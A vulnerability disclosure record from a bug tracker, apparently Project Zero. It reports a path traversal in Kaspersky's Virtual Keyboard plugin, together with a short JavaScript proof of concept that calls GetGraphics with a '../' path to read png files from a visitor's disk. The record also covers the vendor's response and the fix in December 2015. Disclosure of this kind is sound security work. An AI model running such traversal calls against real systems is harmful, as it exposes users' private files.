New issue
Advanced search Search tips
Starred by 2 users
Status: Fixed
Owner:
Closed: Dec 2015
Cc:



Sign in to add a comment
Kaspersky Antivirus Virtual Keyboard GetGraphics() Path Traversal
Project Member Reported by taviso@google.com, Sep 14 2015 Back to list
There is an obvious path traversal in Kaspersky Virtual Keyboard, a hosting website can simply do element.GetGraphics("../../../../whatever") to read any png file on the victims computer.

x = document.createElement("object")
x.type=window.navigator.plugins["Virtual Keyboard KAV"][0].type
document.body.appendChild(x)
x.LinkPluginWithFirefoxExtention('0007BF21-E04A-A741-B059-6A6DB0324A41')
x.GetGraphics('../../../../../../../../../whatever')

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
Project Member Comment 1 by taviso@google.com, Sep 18 2015
This issue wasn't as simple as I thought, Kaspersky informed me that I misunderstood how it worked and I agreed with their assessment.

However, based on their description I pointed out a different (less severe) attack, and they agreed to fix that instead:



Hi Tavis,
 
We will fix the issue that unprivileged user can get access to any png file on disk C using Virtual Keyboard path traversal. We kindly request 90-days period to release a fix for it.
 
Best regards,
Igor

Project Member Comment 2 by taviso@google.com, Dec 10 2015
Labels: -Severity-high Severity-moderate
Status: Fixed
This issue was resolved.
Project Member Comment 3 by taviso@google.com, Dec 10 2015
Labels: -Restrict-View-Commit
Sign in to add a comment